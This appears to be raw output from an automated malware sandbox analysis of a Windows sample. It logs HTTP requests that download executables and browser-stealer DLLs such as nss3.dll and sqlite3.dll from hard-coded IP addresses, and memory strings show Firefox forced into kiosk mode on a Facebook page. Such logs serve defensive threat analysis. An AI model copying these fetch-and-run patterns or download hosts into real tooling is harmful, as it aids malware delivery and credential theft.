Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C61CC60 PR_Recv,

6_2_6C61CC60

Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'moz-extension://31bc1824-4b8f-4b01-9a19-e1bd57d398cf/lib/picture_in_picture_overrides.js[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]Could not access the AddonManager to upgrade the profile. This is most likely because the upgrader is being run from an xpcshell test where the AddonManager is not initialized.sharing,pictureinpicture,crashed,busy,soundplaying,soundplaying-scheduledremoval,pinned,muted,blocked,selected=visuallyselected,activemedia-blocked,indicator-replaces-faviconX! equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://.adsafeprotected.com/jload""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/jload?""://pubads.g.doubleclick.net/gampad/ad""://pixel.advertising.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/tpl?"["://trends.google.com/trends/embed"]"://trends.google.com/trends/embed"["://trends.google.com/trends/embed"]resource://gre/modules/PlacesUtils.sys.mjs"://trends.google.com/trends/embed""://.adsafeprotected.com/services/pub""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.png""://securepubads.g.doubleclick.net/gampad/ad""://ads.stickyadstv.com/auto-user-sync""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//unit/""://track.adform.net/Serving/TrackPoint/""://.adsafeprotected.com/.js""://.adsafeprotected.com/.gif""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/tpl?""://cdn.cmp.advertising.com/firefox-etp""://vast.adsafeprotected.com/vast""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//adj""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com//imp/"resource:///modules/AttributionCode.sys.mjsmain/anti-tracking-url-decorationChild MenuItem not found, it cannot be removed.Could not find any MenuItem with id: getProfileDataAsGzippedArrayBuffermain/anti-tracking-url-decorationresource:///modules/ShellService.sys.mjs:scope > #context-sep-navigation + *, falling back to typed transition.resource://normandy/lib/NormandyUtils.sys.mjsresource://gre/modules/TelemetryArchive.sys.mjsresource://gre/modules/UpdateUtils.sys.mjsresource:///modules/BrowserWindowTracker.sys.mjsresource:///modules/UrlbarUtils.sys.mjsID of a MenuItem cannot be changedservices.sync.clients.devices.mobilemain/translations-identification-modelswebNavigation-createdNavigationTargetChild MenuItem already has a parent.resource://gre/modules/ExtensionParent.sys.mjsgetAndForgetRecentTabTransitionDatamain/websites-with-shared-credential-backendsservices.sync.clients.devices.desktop60e82333-914d-4cfa-95b1-5f034b5a704bresource://gre/modules/AddonManager.sys.mjsUnexpectedly received notification for resource://gre/modules/AsyncShutdown.sys.mjsthis.menusInternal</onClicked/listener/<main/devtools-compatibility-browsersresource:///actors/ClickHandlerParent.sys.mjsresource://gre/modules/WebNavigation.jsmmain/search-default-override-allowlistchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlbrowser.laterrun.bookkeeping.profileCreationTimechrome://browser/content/browser.jsbrowser.laterrun.bookkeeping.sessionCount[xpconnect wrapped nsIMutableArray]resource://gre/modules/ObjectUtils.sys.mjschrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlbrowser.newtabpage.activity-stream.debugtimestamps.about_home_topsites_first_paint_s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://.adsafeprotected.com/services/pub"extensionTypes.ExtensionFileOrCode"://vast.adsafeprotected.com/vast"webRequestFilterResponse.serviceWorkerScript"://.adsafeprotected.com/.gif""://.adsafeprotected.com/.png"This color property is ignored in Firefox >= 89.webRequestBlockingPermissionRequiredMAX_SUSTAINED_WRITE_OPERATIONS_PER_MINUTEPlease use $(ref:runtime.onRestartRequired).^(sha256\|sha512):[0-9a-fA-F]{64,128}$"://www.facebook.com/platform/impression.php""://ads.stickyadstv.com/auto-user-sync""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//imp/"webRequestBlockingPermissionRequired"://.adsafeprotected.com//adj""://.adsafeprotected.com/jload?""://.adsafeprotected.com//Serving/""://pubads.g.doubleclick.net/gampad/ad"webRequestBlockingPermissionRequired"https://ads.stickyadstv.com/firefox-etp"webRequestBlockingPermissionRequired"://.adsafeprotected.com/.js""://.adsafeprotected.com/jsvid"default_public_and_private_interfaces"://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//unit/""://.adsafeprotected.com/jload"reject_trackers_and_partition_foreign"://.adsafeprotected.com/tpl?""://track.adform.net/Serving/TrackPoint/""://vast.adsafeprotected.com/vast""://pubads.g.doubleclick.net/gampad/ad-blk""https://ads.stickyadstv.com/firefox-etp""://ads.stickyadstv.com/auto-user-sync""://www.facebook.com/platform/impression.php""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.gif""://.adsafeprotected.com/.png""://.adsafeprotected.com/.js""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//unit/""://.adsafeprotected.com//imp/""://.adsafeprotected.com/jload""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/jload?""://.adsafeprotected.com/jsvid""*://pixel.advertising.com/firefox-etp" equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingR equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation9 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingg equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php://.adsafeprotected.com/jsvid?*://pubads.g.doubleclick.net/gampad/xml_vmap1*://.adsafeprotected.com//imp/executeIDB/promise</transaction.onabort equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2953836439.000001E7529D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingH equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3007396139.000001E765053000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3001116838.000001E764D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsP equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking% equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking--attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default# equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: FileUtils_openSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0FileUtils_closeSafeFileOutputStream://www.everestjs.net/static/st.v3.js@mozilla.org/network/file-output-stream;1://pub.doubleverify.com/signals/pub.js://track.adform.net/serving/scripts/trackpoint/@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsm://c.amazon-adsystem.com/aax2/apstag.js://auth.9c9media.ca/auth/main.js://static.chartbeat.com/js/chartbeat_video.js://.imgur.com/js/vendor..bundle.jshttps://smartblock.firefox.etp/play.svg://cdn.branch.io/branch-latest.min.js*://connect.facebook.net//sdk.js*://libs.coremetrics.com/eluminate.jsFileUtils_closeAtomicFileOutputStream://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//all.jsresource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/atomic-file-output-stream;1://static.chartbeat.com/js/chartbeat.js://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/facebook.svg://.imgur.io/js/vendor..bundle.jswebcompat-reporter%40mozilla.org:1.5.1webcompat-reporter@mozilla.org.xpiFileUtils_openAtomicFileOutputStream://www.rva311.com/static/js/main..chunk.js@mozilla.org/network/safe-file-output-stream;1://www.google-analytics.com/analytics.js*://www.google-analytics.com/plugins/ua/ec.js://s0.2mdn.net/instream/html5/ima3.js://www.googletagservices.com/tag/js/gpt.js://adservex.media.net/videoAds.js://www.google-analytics.com/gtm/js://.moatads.com//moatheader.js://cdn.optimizely.com/public/.js://js.maxmind.com/js/apis/geoip2//geoip2.js://s.webtrends.com/js/advancedLinkTracking.js://ssl.google-analytics.com/ga.js://imasdk.googleapis.com/js/sdkloader/ima3.js://static.adsafeprotected.com/iasPET.1.js://.vidible.tv//vidible-min.js://cdn.adsafeprotected.com/iasPET.1.js://s.webtrends.com/js/webtrends.js://s.webtrends.com/js/webtrends.min.js://pagead2.googlesyndication.com/tag/js/gpt.js*resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: WinSta0\Default4=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.facebook.com (Facebook)
